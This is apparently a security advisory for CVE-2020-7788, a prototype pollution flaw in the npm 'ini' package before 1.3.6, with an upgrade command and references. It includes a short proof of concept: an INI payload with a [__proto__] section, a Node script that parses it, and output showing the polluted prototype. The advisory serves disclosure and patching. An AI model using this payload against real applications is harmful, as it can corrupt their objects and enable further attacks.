GHSA-qqgx-2p2h-9c37
ini before 1.3.6 vulnerable to Prototype Pollution via ini.parse
Quick fix
GHSA-qqgx-2p2h-9c37 — ini: upgrade to the fixed version with the command below.
npm install ini@1.3.6Details
### Overview The `ini` npm package before version 1.3.6 has a Prototype Pollution vulnerability.
If an attacker submits a malicious INI file to an application that parses it with `ini.parse`, they will pollute the prototype on the application. This can be exploited further depending on the context.
### Patches
This has been patched in 1.3.6.
### Steps to reproduce
payload.ini ``` [__proto__] polluted = "polluted" ```
poc.js: ``` var fs = require('fs') var ini = require('ini')
var parsed = ini.parse(fs.readFileSync('./payload.ini', 'utf-8')) console.log(parsed) console.log(parsed.__proto__) console.log(polluted) ```
``` > node poc.js {} { polluted: 'polluted' } { polluted: 'polluted' } polluted ```
Are you affected?
Enter the version of the package you're using.
Affected packages
References
- https://nvd.nist.gov/vuln/detail/CVE-2020-7788[ADVISORY]
- https://github.com/npm/ini/commit/56d2805e07ccd94e2ba0984ac9240ff02d44b6f1[WEB]
- https://github.com/npm/ini[PACKAGE]
- https://lists.debian.org/debian-lts-announce/2020/12/msg00032.html[WEB]
- https://snyk.io/vuln/SNYK-JS-INI-1048974[WEB]
- https://www.npmjs.com/advisories/1589[WEB]